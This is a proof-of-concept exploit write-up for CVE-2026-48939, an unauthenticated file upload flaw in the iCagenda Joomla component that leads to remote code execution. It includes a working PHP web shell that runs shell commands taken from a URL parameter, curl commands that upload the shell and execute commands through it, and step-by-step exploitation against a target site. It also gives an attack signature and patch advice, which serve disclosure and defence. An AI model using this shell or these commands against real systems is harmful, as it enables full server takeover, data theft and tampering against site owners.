Share
## https://sploitus.com/exploit?id=PACKETSTORM:224540
# CVE-2026-48939 - iCagenda Unauthenticated File Upload to RCE
## Overview
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-48939 |
| **CVSS 4.0 Score** | 10.0 Critical |
| **CVSS Vector** | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| **CWE** | CWE-284: Improper Access Control |
| **Affected Versions** | iCagenda 3.2.1 - 3.9.14 and 4.0.0 - 4.0.7 |
| **Fixed In** | iCagenda 4.0.8 and 3.9.15 |
| **Published** | 20 June 2026 |
## Vulnerability Description
iCagenda, a popular events and calendar component for Joomla, contains an unauthenticated file upload vulnerability that allows remote attackers to upload and execute arbitrary PHP code on Joomla 6 sites.
### Technical Details
The vulnerability exists in the frontend event submission form's file attachment feature:
1. **Missing Access Control**: The submit endpoint (`index.php?option=com_icagenda&task=registration.submit`) does not enforce authentication, bypassing the "Registered Only" access setting.
2. **No File Validation**: Uploaded files are saved with their original extension without:
- Extension allowlist validation
- MIME type verification
- File content inspection
3. **Direct File Write**: Files are written to `/images/icagenda/frontend/attachments/[filename]` directly under the web root.
4. **PHP Execution**: On Joomla 6, the uploaded `.php` files are executable, leading to Remote Code Execution (RCE).
## Proof of Concept
### Method 1: Using curl (Single Command)
```bash
# Create PHP shell payload
cat > /tmp/shell.php << 'EOF'
<?php
echo "CVE-2026-48939 - SHELL ACTIVE\n";
if(isset($_GET['cmd'])) {
echo shell_exec($_GET['cmd'] . " 2>&1");
}
?>
EOF
# Upload the shell
curl -k -s \
-F "title=Test Event" \
-F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
"https://poloss-jomola.ddev.site/icagenda_submit.php"
# Execute commands via uploaded shell
curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"
```
### Method 2: Using PoC Script
```bash
# Navigate to project directory
# Run PoC script
./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site
```
## Exploitation Steps
1. **Identify vulnerable endpoint**:
```
https://target.com/index.php?option=com_icagenda&task=submit
```
2. **Upload PHP web shell**:
```bash
curl -X POST -F "jform[attachment]=@shell.php" \
"https://target.com/index.php?option=com_icagenda&task=submit"
```
3. **Execute shell**:
```bash
curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
```
## Impact
- **Confidentiality**: Complete loss of confidentiality - attacker can read all files
- **Integrity**: Complete loss of integrity - attacker can modify all data
- **Availability**: Complete loss of availability - attacker can deny service
- **Remote Code Execution**: Full server compromise
## Attack Signature
Based on real-world exploitation logs, the attack signature is:
```
# Step 1: Upload
POST /index.php?option=com_icagenda&task=submit
User-Agent: icagenda-batch/1.0
Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"
# Step 2: Execute
GET /images/icagenda/frontend/attachments/shell.php?cmd=...
User-Agent: icagenda-batch/1.0
```
## Remediation
1. **Immediate**: Update iCagenda to version 4.0.8 (or 3.9.15 for legacy branch)
2. **Alternative**: Remove or rename `com_icagenda` folders temporarily
3. **Note**: Unpublishing the component does NOT protect against this vulnerability
## References
- [iCagenda Zero Day RCE - mysites.guru](https://mysites.guru/blog/icagenda-zero-day-file-upload-rce/)
- [iCagenda Official](https://www.icagenda.com/)
- [Changelog 4.0.8](https://www.icagenda.com/docs/changelog/icagenda-4-0-8)
- [CISA ADP Advisory](https://www.cisa.gov/news-events/alerts)
## Disclaimer
This PoC is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.